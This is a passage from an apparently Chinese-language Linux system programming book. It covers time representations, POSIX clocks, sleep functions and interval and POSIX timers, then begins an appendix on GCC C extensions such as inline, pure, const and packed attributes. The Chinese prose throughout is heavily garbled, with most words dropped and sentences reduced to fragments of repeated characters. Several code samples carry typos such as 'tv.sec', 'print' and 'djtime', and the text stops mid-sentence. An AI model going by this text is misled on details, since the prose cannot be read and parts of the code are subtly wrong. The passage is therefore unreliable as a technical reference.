2.6.13 的 HZ 250 jiffy 0.004 。∗ HZ 的
的上以的能提的更的时
。
进程何的 HZ POSIX 时
时率的
long hz;
hz = sysconf (_SC_CLK_TCK);
∗Linux 内的能时时或实时时即内
式 jiffy 。时间的内操作将的时
时。
∗HZ 内的 x86 上以 100、 250 1000。的
空间能何的 HZ 。
– 329 –
10
时间
if (hz &=&
-1)
perror (‘‘sysconf’’); /* should never occur
*/
程时率的时将
时间 POSIX 出的时间
或 HZ 的。 HZ 同的
的率 ABI 的 x86 上的 100。以时周
的 POSIX CLOCKS PER SEC 示的率。
件。时
然时时间然。
的件时时存时间。内时件时
时间。同时内将时间写件时
。理以 hwclock 将时更新时间。
理 Unix 的时间进程
的设墙上时间时间段时间进
的时间以及时。时间相的内。我们
将 Linux 示时间的。
10.1 时间的数据结构
Unix 的展们示单的时间
上实自的时间理。以
单的段。我们我们
。
10.1.1 原始表示
单的 time t文件 <time.h> 。 time t
的。然 Unix 上 ( Linux) 单的 C
的
typedef long time_t;
– 330 –
10
时间
time t 示自以的。对们的
出。实上的然
的 Unix 实出出。 32 的 time t 能示
2,147,483,647 。示我们将 2038 然
的 2038 18 的 22:14:07 时件将
64 的。
10.1.2 毫秒级精度
time t 相的内。 timeval 对
time t 进扩展。文件 <sys/time.h> 对:
#include <sys/time.h>
struct timeval {
time_t tv_sec; /* seconds */
suseconds_t tv_usec; /* microseconds */
};
tv sec tv usec 。的 suseconds t
的 typedef。
10.1.3 纳秒级精度
出对的满 timespec 将提。文件
<time.h> 对
#include <time.h>
struct timespec {
time_t tv_sec; /* seconds */
long tv_nsec; /* nanoseconds */
};
更。
timespec 时间相的更的。然
– 331 –
10
时间
我们将的的然 timeval。
实时提的何
提的能提的。
的的以提的。
10.1.4 “分解”时间
我们将的进 Unix 时间间的或
示时间。程 C 提 tm将
Unix 时间们理的式。 <time.h>
#include <time.h>
struct tm {
int tm_sec; /* seconds */
int tm_min; /* minutes */
int tm_hour; /* hours */
int tm_mday; /* the day of the month */
int tm_mon; /* the month */
int tm_year; /* the year */
int tm_wday; /* the day of the week */
int tm_yday; /* the day in the year */
int tm_isdst; /* daylight savings time? */
#ifdef _BSD_SOURCE
long tm_gmtoff; /* time zone’s offset from
GMT */
const char *tm_zone; /* time zone
abbreviation */
#endif /* _BSD_SOURCE */
};
tm 以我们更的理 time t 的 314159
周周(。空间的示时间
然的示的时更方。
– 332 –
10
时间
tm 段
tm sec
的。 0 59 间以 61
示 2 。
tm min
小时的。 0 59 间。
tm hour
的小时。 0 23 间。
tm mday
的。 0 31 间。 POSIX 0 然
Linux 示上的。
tm mon
以的。 0 11 间。
tm year
1900 以的。
tm wday
周以的。 0 6 间。
tm yday
1 以的。 0 365 间。
tm isdst
示时(DST段的时间效。
DST 效。 0 DST 效。
DST 的。
tm gmtoff 以的时林时间。段
<time.h> BSD SOURCE 出。
tm zone
时的写 EST。段 <time.h>
BSD SOURCE 出。
10.1.5 一种进程时间类型
clock t 示时。。对
同 clock t 示实时率(HZ或 CLOCKS PER SEC。
10.2 POSIX 时钟
的调 POSIX 时实示时间
的。 clockid t 示的 POSIX 时 Linux
CLOCK MONOTONIC
何 进 程 设 的 单 调 的 时
。示自以的
时间。
CLOCK PROCESS CPUTIME ID 处理提给进程的时。
i386 上时时间
– 333 –
10
时间
(TSC存。
CLOCK REALTIME
真实时间(墙上时间时。设时
。
CLOCK THREAD CPUTIME ID 进 程 的 时 程
的。 POSIX 时间
CLOCK REALTIME 实的。
然 Linux 提时的
CLOCK REALTIME。
10.3 时间源精度
SIX clock getres() 给时间的。
#include <time.h>
int clock_getres (clockid_t clock_id,
struct timespec *res);
调 clock getres() 将 clock id 的时存 res
NULL 0。时 -1设 errno 以 >
EFAULT res 的。
EINVAL clock id 上的时间。
以的示将出的时间的
clockid_t clocks[] = {
CLOCK_REALTIME,
CLOCK_MONOTONIC,
CLOCK_PROCESS_CPUTIME_ID,
CLOCK_THREAD_CPUTIME_ID,
(clockid_t) -1 };
int i;
for (i = 0; clocks[i] != (clockid_t) -1; i++) {
– 334 –
10
时间
struct timespec res;
int ret;
ret = clock_getres (clocks[i], &res);
if (ret)
perror (‘‘clock_getres’’);
else
printf (‘‘clock=%d sec=%ld nsec=%ld\n’’,
clocks[i], res.tv_sec, res.tv_nsec);
}
x86 上出的子
clock=0 sec=0 nsec=4000250
clock=1 sec=0 nsec=4000250
clock=2 sec=0 nsec=1
clock=3 sec=0 nsec=1
4,000,250 4 0.004 。 0.004 给
HZ 250 的 x86 时的 (我们的)。
我们 CLOCK REALTIME CLOCK MONOTONIC jiffy 以
及时提的。相的 CLOCK PROCESS CPUTIME ID
CLOCK THREAD CPUTIME ID 更的时间同
x86 上 TSC能提。
Linux 上( Unix POSIX 时的
将文件 librt 。的
的程能以的
$ gcc -Wall -W -O2 -lrt -g -o snippet snippet.c
10.4 取得当前时间
程出以的时间示给相
对时间或的时间给件时间。单的
时间的方 time()
– 335 –
10
时间
#include <time.h>
time_t time (time_t *t);
time() 调时间以自以的的的
示。 t NULL将时间写提的 t 。
时 -1( time t设 errno 相的
。能的 errno EFAULT t 的。
子
time_t t;
printf(‘‘current time: %ld\n’’, (long) time (&t));
printf(‘‘the same value: %ld\n’’. (long) t);
的时方
time t 示的自以的真的的
。 Unix 的方能的
的。 time t 示的。
10.4.1 一个更好的接口
gettimeofday() 扩展 time()上提
#include <sys/time.h>
int gettimeofday (struct timeval *tv,
struct timezone *tz);
调 gettimeofday() 将时间 tv 的 timeval
0。 timezone tz Linux 。
NULL 给 tz。
子
struct timeval tv;
– 336 –
10
时间
int ret;
ret = gettimeofday (&tv, NULL);
if (ret)
perror (”gettimeofday”);
else
printf (”seconds=%ld useconds=%ld\n”,
(long) tv.sec, (long) tv.tv_usec);
timezone 时 内 理时 glibc 能
timezone 的 tz dstime 段。我们将何操作时。
10.4.2 一个高级接口
POSIX 提 clock gettime() 时间的时间。然更的
以。
#include <time.h>
int clock_gettime (clockid_t clock_id,
struct timespec *ts);
时调 0将 clock id 的时间的时间存 ts
。时调 -1设 errno
EFAULT ts 。
EINVAL clock id 上时间。
clockid_t clocks[] = {
CLOCK_REALTIME,
CLOCK_MONOTONIC,
CLOCK_PROCESS_CPUTIME_ID,
CLOCK_THREAD_CPUTIME_ID,
(clockid_t) -1 };
int i;
– 337 –
10
时间
for (i = 0; clocks[i] != (clockid_t) -1; i++) {
struct timespec ts;
int ret;
ret = clock_gettime (clocks[i], &ts);
if (ret)
perror (”clock_gettime”);
else
printf (”clock=%d sec=%ld nsec=%ld\n”,
clocks[i], ts.tv_sec, ts.tv_nsec);
}
10.4.3 取得进程时间
times() 调的进程及子进程的进程时间进程时
间以时时示。
#include <sys/times.h>
struct tms {
clock_t tms_utime; /* user time consumed */
clock_t tms_stime; /* system time consumed */
clock_t tms_cutime; /* user time consumed by
children */
clock_t tms_cstime; /* system time consumed
by children */
};
clock_t times (struct tms *buf);
时调将进程及子进程的进程时间写 buf 的 tms
。的时间时间。时间空间
的时间。时间内空间的时间 (进调或
页的时间)。子进程的时子进程
– 338 –
10
时间
进程对调 waitpid()(或相进。调时
时的单调。以时间
( times() 的时间以时时进。)
的以。内以
处理间的内。
的绝对的调的相对时间然。
时调 -1设 errno。 Linux 上能的
EFAULT示 buf 。
10.5 设置当前时间
的何时间程将时间
设给。提的工 ( date )
。
时间设 time() 相对的 stime()
#define _SVID_SOURCE
#include <time.h>
int stime (time_t *t);
调 stime() 设时间 t 的 0。调
CAP SYS TIME 。的 root 。
时调 -1设 errno EFAULT示 t 或
EPERM示 CAP SYS TIME 。
相单
time_t t = 1;
int ret;
/* set time to one second after the epoch */
ret = stime (&t);
if (ret)
perror (”stime”);
– 339 –
10
时间
我们将将我们的时间式方的 time t
。
10.5.1 高精度定时
gettimeofday() 对的 settimeofday()
#include <sys/time.h>
int settimeofday (const struct timeval *tv ,
const struct timezone *tz);
调 settimeofday() 将时间设 tv 给出的 0。 gettime-
ofday() tz NULL 的。时调 -1将 errno
设
EFAULT tv 或 tz 内存。
EINVAL 提的段效。
EPERM
调进程 CAP SYS TIME 。
的子将时间设 1979 的周。
struct timeval tv = { .tv_sec = 31415926,
.tv_usec = 27182818 };
int ret;
ret = settimeofday (&tv, NULL);
if (ret)
perror (”settimeofday”);
10.5.2 设置时间的一个高级接口
clock gettime() 进 gettimeofday() clock settime() settimeof-
day() 时
#include <time.h>
– 340 –
10
时间
int clock_settime (clockid_t clock_id,
const struct timespec *ts);
调 0 clock id 的时间设 ts 的时间。
时调 -1设 errno
EFAULT ts 。
EINVAL clock id 上时间。
EPERM
进程设时间的相或时间能设。
上以设的时间 CLOCK REALTIME。
settimeofday() 处提(处理
的 timezone 。
10.6 玩转时间
Unix C 提进时间(ASCII
示的时间 time t 间的。 asctime() 将 tm 时
间 ASCII
#include <time.h>
char * asctime (const struct tm *tm);
char * asctime_r (const struct tm *tm, char *buf);
的的。对何时间的调
能 asctime() 程的。
程 程 (以 及 设 的 asc-
time r()。的 buf 提的
26 的。
时 NULL。
mktime() tm time t。
#include <time.h>
time_t mktime (struct tm *tm);
– 341 –
10
时间
mktime() tzset() 将时设 tm 的。时 -1(
time t。
ctime() 将 time t ASCII 示
#include <time.h>
char * ctime (const time_t *timep);
char * ctime_r (const time_t *timep, char *buf);
时 NULL。
time_t t = time (NULL);
printf (”the time a mere line ago: %s”, ctime
(&t));
的新出。能方 ctime()
空。
asctime() ctime() 的。程
的程的程程 ctime r() buf
的上工作。 26 。
gmtime() 将给出的 time t tm UTC 时式示
#include <time.h>
struct tm * gmtime (const time_t *timep);
struct tm * gmtime_r (const time_t *timep, struct
tm *0result);
时 NULL。
的的
程的。程的程程 gmtime r() result 的
上操作。
localtime() localtime r() gmtime() gmtime r()们
将给出的 time t 示时:
– 342 –
10
时间
#include <time.h>
struct tm * localtime (const time_t *timep);
struct tm * localtime_r (const time_t *timep,
struct tm *result);
mktime() localtime() 的调调 tzset()时。 lo-
caltime r() 步的。
difftime() time t 的示相
的。
include <time.h>
double difftime (time_t time1, time_t time0);
POSIX 上 time t difftime() 以
进出的
(double) (time1 - time0)
Linux 上 time t 将。然
性 difftime()。
10.7 调校系统时钟
墙上时间的然对操作绝对时间的
。 make(make Makefile 的内件的程) 的
子。程处理对件
文件的小能小时进新。 make 对
文件( wolf.c文件(wolf.o的时间。文件或
的何文件 wolf.h文件新 make 将文件
更新的文件。然文件文件新处理。
的时时间
小时 date 更新时间。更
新存 wolf.c我们能。时间调
wolf.c 能 wolf.o (即), 进。
– 343 –
10
时间
的 Unix 提 adjtime() 以以的
的调时间。时间进程(NTP
的程以的调时间的 adjtime() 小们对的
#define _BSD_SOURCE
#include <sys/time.h>
int adjtime (const struct timeval *delta,
struct timeval *olddelta);
调 djtime()示内 delta 调时间然
0。 delta 的时间内将时。
delta 时间内将时。内进的
时单调然的。即 delta 调然
时调时时间的时间。
delta NULL内处理的。对
的内将。 olddelta NULL的
将写 timeval 。 delta 设 NULL将 olddelta 设
将以进的。
adjtime() 进的理的子提的 NTP,
。 Linux 以的小。
时 adjtime() -1设 errno
EFAULT delta 或 olddelta 。
EINVAL delta 的调或小。
EPERM
调的 CAP SYS TIME 。
RFC 1305 adjtime() 的进调方更更
的时调。 Linux adjtimex() 调实。
#include <sys/timex.h>
int adjtimex (struct timex *adj);
– 344 –
10
时间
调 adjtimex() 以将内时间相的读 adj 的 timex
。调以性的的 modes 段设
。
文件 <sys/time.h> timex
struct timex {
int modes; /* mode selector */
long offset; /* time offset (usec) */
long freq; /* frequency offset (scaled ppm) */
long maxerror; /* maximum error (usec) */
long esterror; /* estimated error (usec) */
int status; /* clock status */
constant; /* PLL time constant */
long precision; /* clock precision (usec) */
long tolerance; /* clock frequency tolerance
(ppm) */
struct timeval time; /* current time */
long tick; /* usecs between clock ticks */
};
modes 段零或以或的
ADJ OFFSET
offset 设时间。
ADJ FREQUENCY
freq 设率。
ADJ MAXERROR
maxerror 设。
ADJ ESTERROR
esterror 设。
ADJ STATUS
status 设时。
ADJ TIMECONST
constant 设相(PLL时间。
ADJ TICK
tick 设时时。
ADJ OFFSET SINGLESHOT 单 ( adjtime) offset 设时
间。
modes 0设。 CAP SYS TIME 的能
给 modes 零何将设 mode 0
能设何。
– 345 –
10
时间
时 adjtimex() 时
TIME OK
时同步。
TIME INS
将。
TIME DEL 将。
TIME OOP 的进。
TIME OOP 出。
item [TIME BAD] 时同步。
时 adjtimex() -1设 errno
EFAULT adj 。
EINVAL 或更的 modes offset 或 tick 。
EPERM
modes 零调 CAP SYS TIME 。
adjtimex() 调 Linux 的。性的
adjtime()。
RFC 1305 的对 adjtimex() 的超出的
。更 RFC。
10.8 睡眠和等待
的能进程(的段时间。
的 sleep()进程 seconds 的。
#include <unistd.h>
unsigned int sleep (unsigned int seconds);
调的。的调 0能
0 seconds 间的(。
设 errno。 sleep() 的进程实上
。
sleep (7); /* sleep seven seconds */
– 346 –
10
时间
真的进程时间的以调
sleep() 0。
unsigned int s = 5;
/* sleep five seconds: no ifs, ands, or buts
about it */
while ((s = sleep (s)))
;
10.8.1 微秒级精度睡眠
以的进实。操作上
以程的。 usleep()
/* BSD version */
#include <unistd.h>
void usleep (unsigned long usec);
/* SUSv2 version */
#define _XOPEN_SOURCE 500
#include <unistd.h>
int usleep (useconds_t usec);
10.8.2 Linux 的实时支持
调 usleep() 以进程 usec 。的 BSD Single
UNIX Specification(单 UNIX 原上同。 BSD
。然 SUS usleep()
useconds t 。 XOPEN SOURCE 500 或
更的 Linux SUS 。 XOPEN SOURCE 或设小
– 347 –
10
时间
500 Linux BSD 。
SUS 时 0出时 -1。的 errno :
时 EINTR usecs 的 EINVAL( Linux 上
的的出。
useconds t 能满 1,000,000 的。
同原间的以及 Unix 能
的 useconds t 的。能满性
设 usleep() 的
void usleep (unsigned int usec);
unsigned int usecs = 200;
usleep (usecs);
以满的同式以
errno = 0;
usleep (1000);
if (errno)
perror (”usleep”);
对程们 usleep() 的。
10.8.3 纳秒级精度睡眠
Linux usleep() 提更能以提
的 nanosleep()
#define _POSIX_C_SOURCE 199309
#include <time.h>
int nanosleep (const struct timespec *req,
struct timespec *rem);
– 348 –
10
时间
调 nanosleep(), 进程 req 的时间 0。时调
-1设 errno 相。调
时间。 nanosleep() -1设 errno
EINTR。 rem NULL时间(req 的
rem 。程新调将 rem 作给 req(示。
能的 errno
EFAULT req 或 rem 。
EINVAL req 段。
单
struct timespec req = { .tv_sec = 0,
.tv_nsec = 200 };
/* sleep for 200 ns */
ret = nanosleep (&req, NULL);
if (ret)
perror (”nanosleep”);
时的子
struct timespec req = { .tv_sec = 0,
.tv_nsec = 1369 };
struct timespec rem;
int ret;
/* sleep for 1369 ns */
retry:
ret = nanosleep (&req, &rem);
if (ret) {
if (errno == EINTR) {
/* retry, with the provided time
remaining */
req.tv_sec = rem.tv_sec;
– 349 –
10
时间
req.tv_nsec = rem.tv_nsec;
goto retry;
}
perror (”nanosleep”);
}
方(能更效读性以
同效
struct timespec req = { .tv_sec = 1,
.tv_nsec = 0 };
struct timespec rem, *a = &req, *b = &rem;
/* sleep for 1s */
while (nanosleep (a, b) && errno == EINTR) {
struct timespec *tmp = a;
a = b;
b = tmp;
}
nanosleep() 相对 sleep() usleep()
• 提能提或。
• POSIX.1b 。
• 实(方的将。
对 程 然 usleep()
nanosleep()的程 sleep()。 nanosleep() POSIX
新程(或将的
sleep() 或 usleep()。
10.8.4 实现睡眠的高级方法
我们的时间。 POSIX 提
的
#include <time.h>
– 350 –
10
时间
int clock_nanosleep (clockid_t clock_id,
int flags,
const struct timespec *req,
struct timespec *rem);
clock nanosleep() 的 nanosleep()。实上调
ret = nanosleep (&req, &rem);
调
ret = clock_nanosleep (CLOCK_REALTIME, 0, &req,
&rem);
的 clock id flags 。的时间。然
能调进程的 CPU 时( CLOCK PROCESS CPUTIME ID
时间的何调将进程
进程时间将。
时间的程进的的。绝
对时间 CLOCK REALTIME 的。备相对
的时间 CLOCK MONITONIC 绝对理的时间。
flags TIMER ABSTIME 或 0。 TIMER ABSTIME req
的绝对的时间。处理的件。
的以设进程处时间 T0时间 T1。 T0 时进
程调 clock gettime() 时间(T0。然 T1 T0
Y给 clock nanosleep()。时间进程进间
时间的。然的间进程调处理或
页对我们何处理时间时间
以及实间存件的。
TIMER ABSTIME 进程 T1, 。时间
T1 内进程。时间的时间超
T1调即。
我相对绝对。的子进程 1.5
– 351 –
10
时间
struct timespec ts = { .tv_sec = 1, .tv_nsec =
500000000 };
int ret;
ret = clock_nanosleep (CLOCK_MONOTONIC, 0, &ts,
NULL);
if (ret)
perror (”clock_nanosleep”);
相的的子绝对时间 clock gettime() 调
CLOCK MONOTONIC 时间的。
struct timespec ts;
int ret;
/* we want to sleep until one second from NOW */
ret = clock_gettime (CLOCK_MONOTONIC, &ts);
if (ret) {
perror (”clock_gettime”);
return;
}
ts.tv_sec += 1;
printf (”We want to sleep until sec=%ld
nsec=%ld\n”,
ts.tv_sec, ts.tv_nsec);
ret = clock_nanosleep (CLOCK_MONOTONIC,
TIMER_ABSTIME,
&ts, NULL);
if (ret)
perror (”clock_nanosleep”);
程相对的们的。然
实时进程对时间相绝对的
– 352 –
10
时间
性的件。
10.8.5 sleep 的一种可移植实现
我们提 select()
#include <sys/select.h>
int select (int n,
fd_set *readfds,
fd_set *writefds,
fd_set *exceptfds,
struct timeval *timeout);
时提的 select() 提实、的
方。段时间内的 Unix 程 sleep() 满的
的 usleep() 上实的 nanosleep()
写。给 select() 的 n 0给 fd set
NULL以及的时间给 timeout效的方
进程
struct timeval tv = { .tv_sec = 0,
.tv_usec = 757 };
/* sleep for 757 us */
select (0, NULL, NULL, NULL, &tv);
对的 Unix 的性 select() 能
的。
10.8.6 超限
的进程的时间(或
示。进程的时间绝。存
能时间超时间。
以单的调的时间能内
– 353 –
10
时间
能及时进程调能。
然以更的原时超 (timer overruns)。时
的的时间间时。设时
10 时进程 1 的。能 10
的时间相的件(进程。进程
时时离时 1 将
1 内的时间(1 将内将进程。然
时进程时时的 10 将时
。进程将 9 1 的超。
X 单的时 X/2 的率超。
POSIX 时提的时间或的 HZ 以
时超。
10.8.7 替代睡眠
能的。
的的时间的时。
件的的设。文件上内处理
进程的的。内能进程
时进程件的。
10.9 定时器
时提时间进程的。时超时的时间
(delay或超时(expiration。内进程时
的方式时。 Linux 内提时我们将。
时新 60 或
的程 500 。
10.9.1 简单的闹钟
alarm() 单的时
#include <unistd.h>
– 354 –
10
时间
unsigned int alarm (unsigned int seconds);
对的调真实时间 (real time)seconds 将 SIGALRM
给调进程。的处理调新的
的。 seconds 0的设
新的。
调 SIGALRM 处理程。(
处理程的内。的段
SIGALRM 处理程 alarm handler()设的
void alarm_handler (int signum)
{
printf (”Five seconds passed!\n”);
}
void func (void)
{
signal (SIGALRM, alarm_handler);
alarm (5);
pause ();
}
10.9.2 间歇定时器
间时调出 4.2BSD POSIX
以提 alarm() 更的。
#include <sys/time.h>
int getitimer (int which,
struct itimerval *value);
int setitimer (int which,
– 355 –
10
时间
const struct itimerval *value,
struct itimerval *ovalue);
间时 alarm() 的操作方式相能自自以
的式工作:
ITIMER REAL
真 实 时 间。 的 真 实 时 间 内 将
SIGALRM 给进程。
ITIMER VIRTUAL 进程空间的时。的进程时间
内将 SIGVTALRM 给进程。
ITIMER PROF
进程以及内进程时(调
。的时间内将 SIGPROF
给进程。式 ITIMER VIRTUAL 程
能进程的时间内时间。
ITIMER REAL 的时间 alarm() 相同式对程
。
itimeval 时或的时设
时:
struct itimerval {
struct timeval it_interval; /* next value */
struct timeval it_value; /* current value */
};
以提的 timeval
struct timeval {
long tv_sec; /* seconds */
long tv_usec; /* microseconds */
};
settimer() 设时间 it value 的时。时超 it value内
it interval 的时时。 it value 0 时时间间
设 it interval。时效 it interval 0 时。
的时的 it value 设 0时
。
– 356 –
10
时间
ovalue NULL which 的间时的。
getitimer() which 的间时的。
时 0出时 -1设 errno
EFAULT value 或 ovalue 。
EINVAL which 的间时。
的段 SIGALRM 处理程(将
间时的时间设 5 的时间 1 。
void alarm_handler (int signo)
{
printf (”Timer hit!\n”);
}
void foo (void) {
struct itimerval delay;
int ret;
signal (SIGALRM, alarm_handler);
delay.it_value.tv_sec = 5;
delay.it_value.tv_usec = 0;
delay.it_interval.tv_sec = 1;
delay.it_interval.tv_usec = 0;
ret = setitimer (ITIMER_REAL, &delay, NULL);
if (ret) {
perror (”setitimer”);
return;
}
pause ( );
}
– 357 –
10
时间
Unix SIGALRM 实 sleep() usleep()。然 alarm()
setitimer() SIGALRM。程小调
。调的的。的程
nanosleep() POSIX nanosleep() 能。
时程 setitimer() 或 alarm()。
10.9.3 高级定时器
的时自 POSIX 的时。
POSIX 时的时实、以及时
timer create() 时 timer settime() 时
timer delete() 。
POSIX 的时进的新
的(性同时的。
或性 setitimer() 更的。
10.9.3.1 建立一个定时器
timer create() 时
#include <signal.h>
#include <time.h>
int timer_create (clockid_t clockid,
struct sigevent *evp,
timer_t *timerid);
调 timer create() POSIX 时 clockid 相的新时
timerid 存的时 0。调设
时的件将的时
。
的子 POSIX 时 CLOCK PROCESS CPUTIME ID 上新
的时将时 ID 存 timer 。
timer_t timer;
int ret;
– 358 –
10
时间
ret = timer_create (CLOCK_PROCESS_CPUTIME_ID,
NULL,
&timer);
if (ret)
perror (”timer_create”);
时调 -1 timerid 调设 errno
EAGAIN
的。
EINVAL
clockid 的 POSIX 时的。
ENOTSUP clockid 的 POSIX 时时作
时。 POSIX 实 CLOCK REALTIME 时作
时。的时同实。
evp ( NULL 件) 时时的异步。文件
<signal.h> 。的内对程的以
段
#include <signal.h>
struct sigevent {
union sigval sigev_value;
int sigev_signo;
int sigev_notify;
void (*sigev_notify_function)(union sigval);
pthread_attr_t *sigev_notify_attributes;
};
union sigval {
int sival_int;
void *sival_ptr;
};
时的 POSIX 时时内何进程的上
更的能进程内将的内
– 359 –
10
时间
新程时时的能。进程时时的
sigev notify 以
SIGEV NONE
空的。时时。
SIGEV SIGNAL
时时内给进程 sigev signo 的
。处理程 si value 设 sigev value。
SIGEV THREAD 时时内新程(进程内
sigev notify function将 sigev value 的
。程时。 sigev notify attributes
NULL pthread attr t 新程的。
的子的 evp NULL时的将
设:sigev notify SIGEV SIGNAL sigev signo SIGALRM sigev value
时的 ID。时以 POSIX 间时的方式进
。然自方式以更的工作
的子 CLOCK REALTIME 的时。时
时内出 SIGUSR1 si value 设存时 ID 的
struct sigevent evp;
timer_t timer;
int ret;
evp.sigev_value.sival_ptr = &timer;
evp.sigev_notify = SIGEV_SIGNAL;
evp.sigev_signo = SIGUSR1;
ret = timer_create (CLOCK_REALTIME,
&evp,
&timer);
if (ret)
perror (”timer_create”);
10.9.4 设置定时器
timer create() 的时设的。以 timer settime() 将
时间时
– 360 –
10
时间
#include <time.h>
int timer_settime (timer_t timerid,
int flags,
const struct itimerspec *value,
struct itimerspec *ovalue);
调 timer settime() 将 设 timerid 的 时 的 时 间
value,value timerspec
struct itimerspec {
struct timespec it_interval; /* next value */
struct timespec it_value; /* current value */
};
setitimer() it value 时时间。时
时将 it interval 的更新 it value。 it interval 0时间
时 it value 。
提的内 timespec 以提
struct timespec {
time_t tv_sec; /* seconds */
long tv_nsec; /* nanoseconds */
};
flags TIMER ABSTIME value 的时间绝对时间(相对
时间的相。的操作以时间、
相对的时间、时间、以及设时时件。
以的方。
ovalue NULL时的时间将存 itimerspec 。
时设的将设 0。
timer timer create() 的时的
的周时
struct itimerspec ts;
– 361 –
10
时间
int ret;
ts.it_interval.tv_sec = 1;
ts.it_interval.tv_nsec = 0;
ts.it_value.tv_sec = 1;
ts.it_value.tv_nsec = 0;
ret = timer_settime (timer, 0, &ts, NULL);
if (ret)
perror (”timer_settime”);
10.9.4.1 取得定时器的过期时间
以何时 timer gettime() 时的时间
新设
#include <time.h>
int timer_gettime (timer_t timerid,
struct itimerspec *value);
调 timer gettime() 将 timerid 的时时间存 value
的 0。时调 -1设 errno
EFAULT value 。
EINVAL timerid 时。
子
struct itimerspec ts;
int ret;
ret = timer_gettime (timer, &ts);
if (ret)
perror (”timer_gettime”);
else {
– 362 –
10
时间
printf (”current sec=%ld nsec=%ld\n”,
ts.it_value.tv_sec, ts.it_value.tv_nsec);
printf (”next sec=%ld nsec=%ld\n”,
ts.it_interval.tv_sec,
ts.it_interval.tv_nsec);
}
10.9.4.2 取得定时器的超时值
POSIX 给时的超时
#include <time.h>
int timer_getoverrun (timer_t timerid);
时 timer getoverrun() 时实时 (
) 进程间的时。方我们的子 1 的
时 10 调 9。
超 时 DELAYTIMER MAX调 DELAY-
TIMER MAX。
时 -1设 errno EINVAL的
timerid 的时。
子
int ret;
ret = timer_getoverrun (timer);
if (ret == -1)
perror (”timer_getoverrun”);
else if (ret == 0)
printf (”no overrun\n”);
else
printf (”%d overrun(s)\n”, ret);
– 363 –
10
时间
10.9.4.3 删除定时器
时单
#include <time.h>
int timer_delete (timer_t timerid);
调 timer delete() 将 timerid 的时 0。
时调 -1设 errno EINVAL的 timerid
的时。
– 364 –
A
GCC 对 C 的扩展
附录 A
GCC 对 C 语言的扩展
GCC(GNU 集, GNU Compiler Collection C 提扩
展能的扩展能对程。提的
C 能扩展提的能的
。以更效的。扩展对 C
的的调方。
新的 C —ISO C99 GCC 提的扩展能。
扩展能 C99 的扩展能 ISO C99
同的实。新写的 ISO C99 。我们提
及扩展 GCC 的扩展能。
A.1 GNU C
GCC 的 C GNU C 。 90 GNU C
C 的提、零、内、
能。的展 C ISO C99
GNU C 的扩展新的。然 GNU C 提的性
Linux 程 C90 或 C99 的然 GNU C 的
性(扩展能。
的 GCC 扩展的子 Linux 的内内 GNU
C。 Intel 对 Intel C (ICC, Intel C Compiler) 进
ICC 能理 (Linux) 内的 GNU C 扩展。扩展
GCC 。
A.2 内联函数
将内(inline将的段
的调。将存调时
。处理以调的以调进
能的(能将调调进。
的调时时效。然将
– 365 –
A
GCC 对 C 的扩展
调的方然。小单或
调的时以将内。
GCC inline inline 示将进
内。 C99 inline
static inline int foo (void) { /* ... */ }
上 inline 提示对进内
。 GCC 上提扩展能以将进内
方
static inline __attribute__ ((
always_inline)) int foo (void){ /*...*/
} \right)}
内的的处理(preprocessor macro。 GCC
的内的以进。的
#define max(a,b) ({ a > b ? a : b; })
以以的内
static inline max (int a, int b)
{
if (a > b)
return a;
return b;
}
程内。的 x86 上
调的的。的内。
A.3 禁用内联
式 GCC 自内的对进内
。的处理方式时程能出内
工作。__builtin_return_address 时(
– 366 –
A
GCC 对 C 的扩展
内能。 noinline 以内
__attribute_ _ ((noinline)) int foo (void) { /* ...
*/ }
A.4 纯函数
何的映的或
(nonvolatile的。对或的读的。对
以进(loop optimization子式(subexpression
elimination。 pure
__attribute__ ((pure)) int foo (int val) { /*
... */ }
的子 strlen() 。相同的调
的以提出调即。
以
/* 的的写式p */
for (i=0; i < strlen (p); i++)
printf (”%c”, toupper (p[i]));
strlen() 能调
的程写(将 strlen() 单
处理
size_t len;
len = strlen (p);
for (i=0; i < len; i++)
print (”%c”, toupper (p[i]));
更的程(的读能
while (*p)
– 367 –
A
GCC 对 C 的扩展
printf (”%c”, toupper (*p++));
的的能 void
的何的。
A.5 常函数
” ” 更的单。能将
作。的映以的方式进的。
的方式对以进。 abs()
的(进存或的小
作。 const
__attribute__ ((const)) int foo (void) { /*
... */ }
void 的。
A.6 不返回的函数
(调 exit())程以 noreturn
以
__attribute__ ((noreturn)) void foo (int
val) { /* ... */ }
调的以进的
。的能 void。
A.7 分配内存的函数
内存的∗(以
新的内存新内存的程以将 malloc
以进的
∗内存或以上的同内存。内存我们
将的给的时内存。然能更的出
内存。的新的内存的同内存
。
– 368 –
A
GCC 对 C 的扩展
__attribute__ ((malloc)) void * get_page (void)
{
int page_size;
page_size = getpagesize ();
if (page_size <= 0)
return NULL;
return malloc (page_size);
}
A.8 强制调用函数检查返回值
属性warn_unused_result 以示存或
件时能
__attribute__ ((warn_unused_result)) int foo
(void) { /* ... */ }
调的的时处理以程调
处理。 read() 的然
时warn_unused_result 属性。能
void。
A.9 将函数标记为 deprecated
deprecated 属性示调时
__attribute__ ((deprecated)) void foo (void) {
/* ... */ }
提程或时的。
– 369 –
A
GCC 对 C 的扩展
A.10 将函数标记为 used
以的式调。将 used
以示程上
__attribute__ ((used)) void foo (void) { /* ...
*/ }
出相的出的。
写的调时属性。(
used 时时调时能将
。
A.11 将函数或参数标记为 unused
unused 属性示的或示
相的
void foo (long __attribute__ ((unused)) value)
{ /* ... */ }
属性 -W 或 -Wunused
的(件程或处理
真的。
A.12 将结构体进行打包(pack)
packed 属性示对或内存以能小的内存空间
存(内存属性的内存对的。属性
或时的。时
的。将的的小内存空间
(1)。
struct __attribute__ ((packed)) foo (void) {
... };
– 370 –
A
GCC 对 C 的扩展
char 的 int 的
时将 int 的对 char 的 3
将 char 的内存。间
的以对进对。的
能的内存满相上的对。
A.13 增加变量的内存对齐量
以对进 GCC 程给的
小对。对进对时 ABI
的小对小的对。
beard_length进 32 的内存对(的对 32
进 4 对
int beard_length __attribute__ ((aligned (32)))
= 0;
的内存对能件的
内存对更写 C
对的时。存处理存的以
存时以能。 Linux 内。
小内存对以 GCC 将给的对
设的小内存对的。段
parrot_height 的内存对 GCC 以的
double
short parrot_height __attribute__ ((aligned))
= 5;
何内存对时间空间的上方式对的
更空间上的(以及的操作能更时
间以调处理内存的以处理内存。
工能的的内存对。 Linux
相小的的对。时 aligned 的
对设。的对 32
– 371 –
A
GCC 对 C 的扩展
的能对 8 8 进对。
A.14 将全局变量置于寄存器中
GCC 程将的存将程的
内处存。 GCC 的存
。程的存的存 ebx
register int *foo asm (”ebx”);
程的存能(function-clobbered
的存能调时进存
